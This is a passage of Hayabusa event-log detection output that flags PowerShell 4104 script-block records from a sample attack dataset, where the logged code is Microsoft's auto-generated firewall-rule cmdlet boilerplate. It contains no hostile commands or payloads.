[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 